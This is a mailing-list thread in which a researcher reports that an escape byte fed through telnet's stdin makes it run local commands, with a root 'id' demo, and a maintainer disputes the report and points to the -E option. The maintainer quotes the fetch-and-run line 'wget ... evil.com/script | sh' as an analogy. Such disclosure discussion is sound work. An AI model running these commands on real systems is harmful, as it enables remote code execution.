sha0 <[email protected]> writes: > Hi Simon, > > I know this is a "feature", but connecting the stdin of telnet with any kind > of controllable input, will rely en command execution, is a danger default > option.
I'm not sure I follow -- connecting the stdin of /bin/sh (as root) with any kind of input controllable by an attacker is equally dangerous. What difference do you see between that example and your problem? Also, doesn't the -E parameter work? It should disable the escape sequence. > I have also another vulnerability related with stdin parser, is a SIGSEGV, > i'm studying if I can control the movl to overwrite a memory function > pointer in order to get execution, Can you post a backtrace? The telnet interactive prompt parser is most likely just buggy. /Simon > But also the attack vector is stdin, then the attack vector is "rare" > > > regards. > > > 2011/10/3 Simon Josefsson <[email protected]> > >> sha0 <[email protected]> writes: >> >> > Hello, >> > >> > Is posible to inject a scape sequence via stdin to telnet, and arbitrary >> > comands will be executed, >> >> Hi! Thanks for studying InetUtils for security problems. I'm not sure >> I follow your "attack" though. >> >> > for example: >> > >> > >> > # cat evil-file | telnet 127.0.0.1 80 >> > Trying 127.0.0.1... >> > Connected to 127.0.0.1. >> > Escape character is '^]'. >> > >> > telnet> !id >> > uid=0(root) gid=0(root) >> > groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),1 >> > 0(wheel),19(log) >> > Connection closed by foreign host. >> > >> > >> > I think is very dangerous despite of few admins use telnet for moving >> file >> > like this >> >> Yes it is dangerous, so don't do that. Use ftp to transfer files. >> >> > 3. DESCRIPTION >> > ------------------------- >> > When telnet is used to transfer files to remote tcp port, a very >> dangerous >> > vulnerability is present, that lets a remote arbitrary code execution. >> >> The attack seems to be based on tricking the local root user into doing >> something stupid. This is similar to asking the local root user to do >> 'wget -O - http://evil.com/script | sh'. There is no security bug in >> wget or sh just because that is possible. >> >> > 7. SOLUTION >> > ------------------------- >> > The stdin parser must filter the 0x9d byte. >> >> The ^] escape sequence is a documented feature, so I don't think that is >> a solution. >> >> You can use the command line parameter -E to inhibit the escape >> character if you want. Quoting 'telnet --help': >> >> -E, --no-escape use no escape character >> >> /Simon >>
